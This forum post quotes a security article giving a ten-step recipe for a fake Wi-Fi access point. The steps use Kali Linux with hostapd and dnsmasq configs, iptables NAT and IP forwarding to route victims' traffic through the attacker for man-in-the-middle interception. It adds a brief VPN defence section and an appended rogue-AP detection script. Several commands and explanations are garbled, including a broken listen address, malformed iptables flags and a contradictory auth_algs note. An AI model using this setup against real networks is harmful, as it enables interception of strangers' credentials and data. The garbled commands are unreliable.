Creating a fake access point
<blockquote data-quote="Prime" data-source="post: 236" data-attributes="member: 18"><p>Using an encrypted tunnel provided by a VPN helps protect all traffic between your device and the VPN server.</p><p></p><p>Think carefully before connecting to a free public wireless hotspot in a cafeteria, airport, or hotel. Have you ever wondered if the public Wi-Fi you're connecting to is secure? This may be a fake access point created by a fraudster.</p><p></p><p>After installing a fake access point and connecting to the victim's device, the attacker launches a man-in-the-middle (MITM) attack to intercept data between the victim's device and the fake access point in order to carry out further malicious actions.</p><p></p><p>Unfortunately, this is not fiction. This scenario is easily implemented in real life. A man-in-the-middle attack on a Wi-Fi network occurs when the main data transfer route between the victim's device and the Internet passes through the attacking device.</p><p></p><p>After a successful man-in-the-middle attack, the attacker will get their hands on victims' confidential information, such as email, accounts, password, credit card number, and other important information that is not protected by security protocols. A cybercriminal can easily access sensitive data using Ettercap, Dsn, Mailsnarf, Urlsnarf, Wireshark, Cain and Abel, and other tools.</p><p></p><p>Cybercriminals can also use fake wireless access points to collect your information. To do this, they create an access point in a public place with the approximate name "Free Public WiFi", which unsuspecting users consider real. You connect to a Wi-Fi network, while attackers track/steal your data.</p><p>See how this attack can be carried out using just one laptop running Kali Linux. 
The peculiarity of the attack is that the criminal and the victim are very close, almost side by side, in the range of the Wi-Fi signal.</p><p></p><p>The following example is intended for educational purposes ONLY. Under no circumstances should you use it for illegal activities.</p><p></p><p><strong>Step 1.</strong> Before creating a fake access point using Kali Linux, run the command "<strong>sudo apt-get update</strong>". This command updates the list of all packages to update, both old packages that need updating and new ones that are stored.</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image001.jpg" alt="image001.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Step 2. </strong>You must have access to install <strong>hostapd</strong> and <strong>dnsmasq</strong>. Dnsmasq is a small DNS / DHCP server that we will use in this setup.</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image002.jpg" alt="image002.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p>Before you start installing <strong>hostapd</strong>, you should check the wireless connection using the "<strong>iwconfig</strong>" command.</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image003.jpg" alt="image003.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p>From the above command output, you can see that <strong>wlan0</strong> is the name of our wireless interface.</p><p></p><p><strong>Step 3.</strong> Now you need to put this wireless interface into monitoring mode by entering the following commands:</p><p>Code:</p><p>ifconfig wlan0 down</p><p>iwconfig wlan0 mode monitor</p><p>ifconfig wlan0 up</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image004.jpg" alt="image004.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Step 4.</strong> To run Hostapd, we need to create a 
configuration file for this tool, which will contain all the information about the SSID, passphrase, channel number, etc.</p><p></p><p>Just create a directory in / root using "<strong>mkdir / root / accesspoint</strong>” to save all the necessary files for this installation.</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image005.jpg" alt="image005.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Step 5.</strong> Now create a hostapd configuration file (hostapd.conf) in the / root / accesspoint directory and write the following information in it:</p><p>Code:</p><p>interface=wlan0</p><p>driver=nl80211</p><p>ssid=Το όνομα που θέλετε (π.χ. Free WiFi)</p><p>hw_mode=g</p><p>channel=11</p><p>macaddr_acl=0</p><p>ignore_broadcast_ssid=0</p><p>auth_algs=1</p><p>wpa=2</p><p>wpa_passphrase=iguru123</p><p></p><p>wpa_key_mgmt=WPA-PSK</p><p>wpa_pairwise=CCMP</p><p>wpa_group_rekey=86400</p><p>ieee80211n=1</p><p>wme_enabled=1</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image006.jpg" alt="image006.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p>Here we'll see what it all means:</p><p>interface = A wireless interface (connection) for hosting an access point, for example. <strong>wlan0</strong></p><p>driver = <strong>Nl80211</strong> is the new public 802.11 network interface, which is now being replaced by cfg80211</p><p>ssid = Wireless network name</p><p>hw_mode = Sets how the interface and allowed channels work. (Usually a, B, and g are used)</p><p>channel = Sets the channel for hostapd to work on. (From 1 to 13)</p><p>macaddr_acl = Used for Mac filtering (0 - disabled, 1 - enabled)</p><p>ign_broadcast_ssid = Used to create hidden access points</p><p>auth_algs = Sets the authentication algorithm (0 for public access, 1 for public access)</p><p>wpa_passphrase = Contains your wireless password</p><p></p><p><strong>Step 6</strong> . 
Simply launch the access point with the following command:</p><p>Code:</p><p>hostapd hostapd.conf</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image007.jpg" alt="image007.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p>As you can see, your hostapd is working successfully with wlan0: <strong>AP-ENABLED</strong> and a new hwaddr that is randomly assigned <strong>“90:f6:52:e3:2e:c2"</strong>, as well as the ssid you set.</p><p></p><p><strong>Step 7.</strong> Now you need to configure network routing using the dnsmasq tool so that you can switch traffic between network nodes, and there is also a path for sending data.</p><p></p><p>Create a configuration file in the root directory named <strong>dnsmasq.conf</strong> and write the following instructions:</p><p>Code:</p><p>interface=wlan0</p><p>dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h</p><p>dhcp-option=3,192.168.1.1</p><p>dhcp-option=6,192.168.1.1</p><p>server=8.8.8.8</p><p>log-queries</p><p>log-dhcp</p><p>listen-address=127.0 .0.1</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image008.jpg" alt="image008.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Step 8</strong>. Assign the network gateway and network mask wlan0 to the interface and add the routing table as shown below:</p><p>Code:</p><p>ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0</p><p>route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1</p><p></p><p>Then you need to start the dnsmasq service with the configuration file that we created in the previous step:</p><p>Code:</p><p>dnsmasq -C dnsmasq.conf -d</p><p></p><p>A webserver designed to provide domain names and related services for smallTFTPandDHCP,DNS-lightweight and fast-configuringDnsmasq Dnsmasq is great for the limited resources of routers and firewalls. 
Dnsmasq can also be configured to cache DNS queries to improve the speed of DNS lookups on sites that they have already visited.</p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image009.jpg" alt="image009.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p><strong>Step 9</strong>. Before you grant Internet access to your victims, make sure that you have configured iptables, only then can you collect data and perform various further attacks, such as Man-in-the-Middle (MITM), DNS spoofing, ARP spoofing, etc.</p><p></p><p>Code:</p><p>iptables –table nat –append POSTROUTING -out-interface eth0 -j MASQUERADE</p><p>iptables –append FORWARD –in-interface wlan0 -j ACCEPT</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image010.jpg" alt="image010.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Step 10</strong> . The last step. Enable the IP forwarding process by typing "<strong>echo 1> / proc / sys / net / ipv4 / ip_forward</strong>".</p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image011.jpg" alt="image011.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>The fake access point will provide its victim with an Internet connection via an Ethernet network card, thereby ensuring that the device is connected to the fake access point. All victim traffic will now pass through the fake access point.</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image012.jpg" alt="image012.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Protection against fake access points</strong></p><p>There are not many ways to protect against such attacks. At first glance, it seems that the problem can be solved by using wireless encryption for protection. 
However, it is not effective in this case, because WPA does not encrypt user data when the victim is already connected to the access point.</p><p>The author of the article recommends using a virtual private network (VPN) for protection. Using an encrypted tunnel provided by a VPN helps protect all traffic between your device and the VPN server.</p><p></p><h4>About the author: Anastasia Vasileiadis</h4><p>PC specialist, penetration tester, ethical hacker, cybersecurity expert, malware analyst, information security researcher, reverse engineering specialist.</p><p></p><p>(c) <a href="https://www.securitylab.ru/analytics/538719.php" target="_blank">https://www.securitylab.ru/analytics/538719.php</a></p></blockquote><p></p>
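<p>A defensive check for the scenario in the quoted post, added here as an example and not part of the original post or the securitylab.ru article: it parses Wi-Fi scan results and flags beacons that advertise a known SSID from a BSSID, or with a security setting, that is not in the operator's inventory. The inventory and all scan lines are constructed, and the input shape assumes the terse output of nmcli.</p>

```python
from dataclasses import dataclass

# Hypothetical inventory of the operator's real access points (constructed values).
KNOWN_APS = {
    "Free WiFi": {"bssids": {"02:00:5e:10:00:01", "02:00:5e:10:00:02"},
                  "security": "WPA2"},
}

# Constructed scan lines, shaped like the output of
#   nmcli -t -f SSID,BSSID,CHAN,SECURITY device wifi list
# (terse mode: ':' separates fields, a literal ':' is escaped as '\:').
# 90:F6:52:E3:2E:C2 is the hwaddr shown in the post's hostapd output.
SAMPLE_SCAN = r"""
Free WiFi:02\:00\:5E\:10\:00\:01:1:WPA2
Free WiFi:02\:00\:5E\:10\:00\:02:6:WPA2
Free WiFi:90\:F6\:52\:E3\:2E\:C2:11:WPA2
Free WiFi:02\:00\:5E\:10\:00\:01:1:
CoffeeShop-Guest:02\:00\:5E\:20\:00\:09:6:WPA2
"""

@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    security: str

def split_terse(line):
    """Split one terse line on unescaped ':' and drop the escaping backslashes."""
    fields, cur, i = [], [], 0
    while i < len(line):
        if line[i] == "\\" and i + 1 < len(line):
            cur.append(line[i + 1])
            i += 2
        elif line[i] == ":":
            fields.append("".join(cur))
            cur = []
            i += 1
        else:
            cur.append(line[i])
            i += 1
    fields.append("".join(cur))
    return fields

def parse_scan(text):
    beacons = []
    for line in text.strip().splitlines():
        parts = split_terse(line)
        if len(parts) != 4 or not parts[2].isdigit():
            continue  # skip malformed lines instead of guessing
        ssid, bssid, chan, sec = parts
        sec = "OPEN" if sec.strip() in ("", "--") else sec.strip()
        beacons.append(Beacon(ssid, bssid.lower(), int(chan), sec))
    return beacons

def find_suspects(beacons, known=KNOWN_APS):
    """Return (bssid, channel, reason) for beacons that contradict the inventory."""
    findings = []
    for b in beacons:
        policy = known.get(b.ssid)
        if policy is None:
            continue  # SSID we do not operate; nothing to compare against
        if b.bssid not in policy["bssids"]:
            findings.append((b.bssid, b.channel, "unknown BSSID advertising a known SSID"))
        elif b.security != policy["security"]:
            findings.append((b.bssid, b.channel,
                             f"security {b.security} differs from expected {policy['security']}"))
    return findings

if __name__ == "__main__":
    for finding in find_suspects(parse_scan(SAMPLE_SCAN)):
        print(finding)
```

<p>A finding is a triage lead, not proof: a newly installed legitimate access point also shows up as an unknown BSSID, and an access point that copies both BSSID and security settings will not be flagged, which is why the post's VPN recommendation still applies.</p>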